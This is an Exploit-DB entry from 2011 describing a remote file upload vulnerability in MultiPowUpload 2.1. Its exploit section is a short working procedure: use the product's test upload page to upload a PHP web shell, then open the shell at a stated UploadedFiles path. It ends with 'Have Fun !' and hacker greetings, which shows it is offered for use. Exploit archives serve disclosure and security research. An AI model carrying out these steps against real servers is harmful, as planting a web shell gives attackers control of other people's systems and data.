MultiPowUpload 2.1 - Remote File Upload Vulnerability

EDB-ID: 16058 CVE: N/A OSVDB-ID: N/A
Verified: Author: DIES3L Published: 2011-01-26
Download Exploit: Source Raw Download Vulnerable App:
[#] Exploit Title:  MultiPowUpload v 2.1 Remote File Upload Vulnerability
[#] Author: DIES3L
[#] Email: zxn@Hotmail.Com
[#] Date: 26-1-2011
[#] Software Link: http://www.element-it.com
[#] Download Software : http://www.element-it.com/Download/ElementIT.MultiPowUpload3.zip
[#] Version: 2.1
[#] Tested on: LiNuX

======================

[-- Exploit --]
http://localhost/[path]/uploadtest.html

+ Click Browse Then Chose Your File [SHELL.php]
+ Your Shell Here :
http://localhost/[path]/FileProcessingScripts/PHP/UploadedFiles/[SHELL.php]

Have Fun !
======================

[-- Greetz To --]
ALL H4ck4rs FroM s4uD1 Ar4b!a ..

======================